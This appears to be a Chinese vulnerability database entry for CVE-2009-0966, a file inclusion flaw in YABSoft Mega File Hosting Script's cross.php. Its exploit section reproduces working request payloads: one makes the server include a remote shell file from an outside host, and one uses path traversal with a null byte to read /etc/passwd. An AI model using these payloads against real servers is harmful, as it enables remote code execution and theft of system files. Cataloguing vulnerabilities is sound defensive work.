Yabsoft Mega File Hosting Script 'cross.php'远程文件包含漏洞

漏洞ID	1117481	漏洞类型	代码注入
发布时间	2009-03-17	更新时间	2009-04-01
CVE编号	CVE-2009-0966	CNNVD-ID	CNNVD-200903-323
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/8230
https://cxsecurity.com/issue/WLB-2009030211
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-323

|漏洞详情

MegaFileHostingScrip(MFHS)是一种先进的文件寄存及共享脚本，让用户上载大文件到服务器和电子邮件中的文件下载链接到自己和其他电子邮件收件人。YABSoftMegaFileHosting1.2版本的cross.php中存在PHP远程文件包含漏洞。远程攻击者可以借助url参数中的一个URL，执行任意PHP代码。注意：该漏洞还可以借助..序列，包含和运行任意本地文件。

|漏洞EXP

#####################################################
# Mega File Hosting || Remote/Local File inclusion #  
# For #  
# All Version #  
#####################################################

#############################################
Just addition This Exploit and enjoy #
#############################################

   
   
/cross.php?url=http://site.com/sh3ll.txt  
/cross.php?url=../../../.../../../../../etc/passwd%00  


#############################################
Author Garry /// 25/02/2009 # Www.Hacking.ge 
#############################################

# milw0rm.com [2009-03-17]

|参考资料

来源:XF
名称:megafile-cross-file-include(49302)
链接:http://xforce.iss.net/xforce/xfdb/49302
来源:BID
名称:34157
链接:http://www.securityfocus.com/bid/34157
来源:MILW0RM
名称:8230
链接:http://www.milw0rm.com/exploits/8230
来源:SECUNIA
名称:34325
链接:http://secunia.com/advisories/34325
来源:OSVDB
名称:52789
链接:http://osvdb.org/52789

Yabsoft Mega File Hosting Script 'cross.php'远程文件包含漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞